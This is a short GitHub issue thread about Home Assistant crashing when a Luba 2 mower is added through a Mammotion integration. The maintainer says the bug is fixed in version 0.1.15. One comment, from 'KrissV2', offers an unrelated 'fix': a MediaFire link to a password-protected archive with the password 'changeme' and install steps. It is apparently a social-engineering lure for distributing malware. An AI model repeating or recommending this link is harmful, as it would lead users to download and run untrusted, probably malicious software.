### ISSUE TITLE
If device added HA crashes

### ISSUE THREAD

**Issue by Sergey842248** [mikey0000/Mammotion-HA#96]
### The problem

If I add my Luba 2 to through the Integration to Home Assistant, my Home Assistant crashes and isn't reachable anymore. I'm using a Raspberry Pi 5 (4GB). 
Anyone have the same problem or a solution?
May I must also install Pymammotion?

### What Mammotion mower are you using?

Luba 2

### What version of the Mammotion intergration are you using?

0.1.11

### What version of Home Assistant Core are you running?

core-2024.8.3

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mikey0000** [comment]
Should be resolved in 0.1.15

**Comment by mikey0000** [comment]
If I don't hear back in a day or so, I'll close this as resolved.

**Comment by Sergey842248** [comment]
Sry, bought a new Raspberry Pi, now everything works well. Thanks
